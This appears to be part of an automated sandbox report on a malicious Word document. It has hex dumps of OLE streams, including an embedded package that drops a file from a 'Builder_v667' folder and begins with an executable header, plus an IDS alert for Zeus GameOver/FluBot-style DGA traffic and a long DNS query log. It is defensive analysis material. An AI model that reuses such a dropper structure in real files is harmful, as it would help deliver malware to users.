                        Data Raw:16 01 0b 00 02 00 6a 61 78 2e 6b 00 43 3a 5c 55 73 65 72 73 5c 4d 79 50 63 5c 44 65 73 6b 74 6f 70 5c 42 75 69 6c 64 65 72 5f 76 36 36 37 5c 6a 61 78 2e 6b 00 00 00 03 00 27 00 00 00 43 3a 5c 55 73 65 72 73 5c 4d 79 50 63 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 54 65 6d 70 5c 6a 61 78 2e 6b 00 00 00 0b 00 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00
                        General
                        Stream Path:ObjectPool/_1683339676/\x3EPRINT
                        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                        Stream Size:4964
                        Entropy:3.3635954598868976
                        Base64 Encoded:False
                        Data ASCII:. . . . l . . . . . . . . . . . # . . . / . . . . . . . . . . . ! . . . . . . E M F . . . . d . . . . . . . . . . . . . . . . . . . . . . . V . . . . . . i . . . . . . . . . . . . . . . . . . . . . : . . . . . . . . . . . . . . . . . . . . . . . . . . ' . . . 5 . . . R . . . p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S . e . g . o . e . . U . I . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . . . . . . . . [ o . . . . ( ? .
                        Data Raw:01 00 00 00 6c 00 00 00 04 00 00 00 00 00 00 00 23 00 00 00 2f 00 00 00 00 00 00 00 00 00 00 00 21 04 00 00 91 05 00 00 20 45 4d 46 00 00 01 00 64 13 00 00 0d 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 56 05 00 00 97 02 00 00 69 01 00 00 af 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 cc 83 05 00 3a ad 02 00 0a 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 09 00 00 00
                        General
                        Stream Path:ObjectPool/_1683339676/\x3ObjInfo
                        File Type:data
                        Stream Size:6
                        Entropy:1.2516291673878228
                        Base64 Encoded:False
                        Data ASCII:. . . . . .
                        Data Raw:00 00 03 00 0d 00
                        General
                        Stream Path:WordDocument
                        File Type:data
                        Stream Size:4096
                        Entropy:1.3806636157466747
                        Base64 Encoded:False
                        Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                        04/26/23-12:39:11.196625 | UDP | 2018316 | ET TROJAN Possible Zeus GameOver/FluBot Related DGA NXDOMAIN Responses | 53 | 57536 | 1.1.1.1 | 192.168.2.2
                        Apr 26, 2023 12:39:38.255434036 CEST6050853192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:38.273530006 CEST53605081.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:38.570481062 CEST6509653192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:38.589240074 CEST53650961.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:38.597986937 CEST5753653192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:38.658416033 CEST53575361.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:38.664870024 CEST5874353192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:38.683018923 CEST53587431.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:38.958209991 CEST6002053192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:38.976289988 CEST53600201.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:38.985553026 CEST6232753192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:39.036410093 CEST53623271.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:39.042085886 CEST5220253192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:39.060142040 CEST53522021.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:39.351525068 CEST5924353192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:39.369873047 CEST53592431.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:39.374178886 CEST5290153192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:39.392354965 CEST53529011.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:39.398211956 CEST5279353192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:39.416460991 CEST53527931.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:39.682035923 CEST6353253192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:39.700114012 CEST53635321.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:39.707849979 CEST4960953192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:39.725884914 CEST53496091.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:39.730360031 CEST5543353192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:39.748420954 CEST53554331.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:40.007927895 CEST5651453192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:40.027004004 CEST53565141.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:40.035480976 CEST5726453192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:40.053421974 CEST53572641.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:40.063458920 CEST5705653192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:40.081661940 CEST53570561.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:40.333431959 CEST5264953192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:40.351634979 CEST53526491.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:40.356144905 CEST5243853192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:40.421119928 CEST53524381.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:40.428198099 CEST5361153192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:40.446494102 CEST53536111.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:40.691144943 CEST6270853192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:40.800682068 CEST53627081.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:40.805979967 CEST6018453192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:40.824227095 CEST53601841.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:40.836028099 CEST6236853192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:40.853950024 CEST53623681.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:41.118069887 CEST5992553192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:41.135910034 CEST53599251.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:41.140348911 CEST5671953192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:41.205368996 CEST53567191.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:41.210220098 CEST4973553192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:41.228538990 CEST53497351.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:41.495321035 CEST5193453192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:41.513679981 CEST53519341.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:41.519398928 CEST5016453192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:41.537609100 CEST53501641.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:41.544898033 CEST5219153192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:41.563388109 CEST53521911.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:41.843954086 CEST5627953192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:41.881727934 CEST53562791.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:41.893544912 CEST6520153192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:41.911837101 CEST53652011.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:41.920078039 CEST6285353192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:41.938281059 CEST53628531.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:42.197684050 CEST5701953192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:42.215810061 CEST53570191.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:42.222547054 CEST5412053192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:42.241482973 CEST53541201.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:42.261782885 CEST5173153192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:42.280442953 CEST53517311.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:42.512162924 CEST5721253192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:42.530639887 CEST53572121.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:42.535978079 CEST5707053192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:42.553894043 CEST53570701.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:42.563771009 CEST5626253192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:42.581707954 CEST53562621.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:42.824858904 CEST6296053192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:42.843326092 CEST53629601.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:42.847652912 CEST6501853192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:42.865725994 CEST53650181.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:42.878482103 CEST6068153192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:42.896660089 CEST53606811.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:43.137412071 CEST6292553192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:43.155395031 CEST53629251.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:43.161530972 CEST5670353192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:43.179837942 CEST53567031.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:43.189310074 CEST6249153192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:43.251986027 CEST53624911.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:43.501101017 CEST6143753192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:43.518903017 CEST53614371.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:43.524477959 CEST5506153192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:43.542692900 CEST53550611.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:43.548476934 CEST5732753192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:43.566639900 CEST53573271.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:43.831583023 CEST5808853192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:43.849920034 CEST53580881.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:43.854299068 CEST4927053192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:43.872427940 CEST53492701.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:43.878312111 CEST6223553192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:43.896997929 CEST53622351.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:44.251781940 CEST5611353192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:44.269948959 CEST53561131.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:44.274286032 CEST6431553192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:44.292511940 CEST53643151.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:44.297103882 CEST5758453192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:44.315087080 CEST53575841.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:44.578454018 CEST5692453192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:44.596997023 CEST53569241.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:44.611851931 CEST6160853192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:44.632889032 CEST53616081.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:44.637315989 CEST5709353192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:44.655467987 CEST53570931.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:45.043112993 CEST5666253192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:45.061364889 CEST53566621.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:45.070739031 CEST5756953192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:45.088486910 CEST53575691.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:45.104144096 CEST5914053192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:45.122739077 CEST53591401.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:45.389152050 CEST6320053192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:45.407304049 CEST53632001.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:45.414143085 CEST5261553192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:45.432085991 CEST53526151.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:45.436789036 CEST6208253192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:45.454917908 CEST53620821.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:45.721641064 CEST5279453192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:45.739859104 CEST53527941.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:45.745240927 CEST5250253192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:45.763205051 CEST53525021.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:45.774507999 CEST5714753192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:45.792438984 CEST53571471.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:46.063013077 CEST6251253192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:46.081954002 CEST53625121.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:46.089236021 CEST5852053192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:46.107233047 CEST53585201.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:46.114190102 CEST6459153192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:46.133147955 CEST53645911.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:46.400913000 CEST6185153192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:46.419008970 CEST53618511.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:46.423901081 CEST5109453192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:46.441973925 CEST53510941.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:46.446404934 CEST6073853192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:46.465137005 CEST53607381.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:46.718122005 CEST5549553192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:46.736310005 CEST53554951.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:46.748420000 CEST5288053192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:46.766447067 CEST53528801.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:46.771853924 CEST6280653192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:46.946666002 CEST53628061.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:47.197304964 CEST6293753192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:47.216006041 CEST53629371.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:47.220606089 CEST5042653192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:47.239006042 CEST53504261.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:47.244334936 CEST5820653192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:47.263202906 CEST53582061.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:47.557291031 CEST6111553192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:47.575716019 CEST53611151.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:47.584383011 CEST5754153192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:47.602497101 CEST53575411.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:47.608306885 CEST5221453192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:47.626724958 CEST53522141.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:47.885262966 CEST5444253192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:47.903614998 CEST53544421.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:47.910164118 CEST5449553192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:47.928076029 CEST53544951.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:47.932490110 CEST4934853192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:47.950504065 CEST53493481.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:48.211174965 CEST5503153192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:48.229121923 CEST53550311.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:48.235518932 CEST4950653192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:48.253185987 CEST53495061.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:48.261284113 CEST5693353192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:48.278902054 CEST53569331.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:48.549436092 CEST6435853192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:48.567838907 CEST53643581.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:48.573126078 CEST5977353192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:48.591552019 CEST53597731.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:48.596141100 CEST6460353192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:48.666230917 CEST53646031.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:48.918684959 CEST5650253192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:48.936786890 CEST53565021.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:48.941415071 CEST5165953192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:48.959306955 CEST53516591.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:48.966664076 CEST5450553192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:48.984811068 CEST53545051.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:49.234384060 CEST6365053192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:49.380244970 CEST53636501.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:49.390918016 CEST6097253192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:49.408900976 CEST53609721.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:49.414436102 CEST6542053192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:49.432975054 CEST53654201.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:49.744971037 CEST5429753192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:49.763540983 CEST53542971.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:49.768004894 CEST5687753192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:49.786266088 CEST53568771.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:49.790781021 CEST6274553192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:49.809228897 CEST53627451.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:50.063132048 CEST5828653192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:50.081069946 CEST53582861.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:50.085740089 CEST5620553192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:50.103955030 CEST53562051.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:50.111629009 CEST5609653192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:50.129532099 CEST53560961.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:50.479494095 CEST4985453192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:50.497586012 CEST53498541.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:50.503282070 CEST5673353192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:50.521241903 CEST53567331.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:50.528803110 CEST5687353192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:50.546974897 CEST53568731.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:50.973819971 CEST6394353192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:50.992319107 CEST53639431.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:50.998435020 CEST6488553192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:51.017086029 CEST53648851.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:51.024601936 CEST6109453192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:51.043226957 CEST53610941.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:51.445899010 CEST6028153192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:51.463788986 CEST53602811.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:51.471163034 CEST5460153192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:51.488984108 CEST53546011.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:51.500432014 CEST5973353192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:51.519527912 CEST53597331.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:51.971822023 CEST5038053192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:51.989938974 CEST53503801.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:51.996325016 CEST5775953192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:52.014364004 CEST53577591.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:52.021647930 CEST6358053192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:52.039856911 CEST53635801.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:52.406902075 CEST4953953192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:52.425313950 CEST53495391.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:52.437316895 CEST5236953192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:52.455692053 CEST53523691.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:52.461044073 CEST6412953192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:52.479362011 CEST53641291.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:52.830590010 CEST5459253192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:52.848963022 CEST53545921.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:52.861413956 CEST5564053192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:52.880069971 CEST53556401.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:52.889728069 CEST6164253192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:52.907870054 CEST53616421.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:53.196815014 CEST6490953192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:53.215030909 CEST53649091.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:53.220861912 CEST5399253192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:53.238734007 CEST53539921.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:53.246109962 CEST5452753192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:53.264389992 CEST53545271.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:53.523694038 CEST5995353192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:53.541906118 CEST53599531.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:53.547945023 CEST6008953192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:53.566876888 CEST53600891.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:53.571973085 CEST6458453192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:53.590399981 CEST53645841.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:53.945209026 CEST5519053192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:53.963627100 CEST53551901.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:53.972563028 CEST5828353192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:53.991355896 CEST53582831.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:53.996865988 CEST6510653192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:54.015221119 CEST53651061.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:54.244370937 CEST5043853192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:54.263354063 CEST53504381.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:54.267894030 CEST5743453192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:54.286092997 CEST53574341.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:54.298515081 CEST6362553192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:54.316795111 CEST53636251.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:54.678462982 CEST6288253192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:54.696520090 CEST53628821.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:54.702570915 CEST5497153192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:54.720599890 CEST53549711.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:54.737612963 CEST6125553192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:54.755609989 CEST53612551.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:54.983362913 CEST4921653192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:55.001580000 CEST53492161.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:55.012964010 CEST6203553192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:55.030968904 CEST53620351.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:55.035898924 CEST5975953192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:55.053806067 CEST53597591.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:55.363281965 CEST6436653192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:55.381143093 CEST53643661.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:55.391248941 CEST5163753192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:55.409434080 CEST53516371.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:55.418618917 CEST5771653192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:55.437134981 CEST53577161.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:55.664350033 CEST6472053192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:55.682638884 CEST53647201.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:55.692841053 CEST5112053192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:55.710911036 CEST53511201.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:55.716710091 CEST5780553192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:55.734944105 CEST53578051.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:56.053658009 CEST5035953192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:56.071868896 CEST53503591.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:56.081125975 CEST5731353192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:56.099952936 CEST53573131.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:56.108582020 CEST5069353192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:56.126780987 CEST53506931.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:56.346709013 CEST5781853192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:56.364820957 CEST53578181.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:56.369335890 CEST5188153192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:56.387249947 CEST53518811.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:56.399204016 CEST5966053192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:56.417284012 CEST53596601.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:56.688631058 CEST6277453192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:56.706506014 CEST53627741.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:56.711631060 CEST6322953192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:56.729718924 CEST53632291.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:56.831353903 CEST6463353192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:56.849545956 CEST53646331.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:57.075263023 CEST5583153192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:57.093929052 CEST53558311.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:57.098506927 CEST5018653192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:57.116561890 CEST53501861.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:57.121539116 CEST6158553192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:57.139308929 CEST53615851.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:57.483131886 CEST5449753192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:57.501365900 CEST53544971.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:57.508858919 CEST5952053192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:57.526530981 CEST53595201.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:57.533730984 CEST6478953192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:57.551949024 CEST53647891.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:58.011830091 CEST5328253192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:58.030112028 CEST53532821.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:58.065273046 CEST5272153192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:58.083681107 CEST53527211.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:58.096985102 CEST6369453192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:58.114965916 CEST53636941.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:58.431158066 CEST5541753192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:58.449199915 CEST53554171.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:58.462682962 CEST5466953192.168.2.21.1.1.1
                        Apr 26, 2023 12:39:58.480940104 CEST53546691.1.1.1192.168.2.2
                        Apr 26, 2023 12:39:58.486794949 CEST5118853192.168.2.21.1.1.1
                        Apr 26, 2023 12:40:28.181953907 CEST5109853192.168.2.21.1.1.1
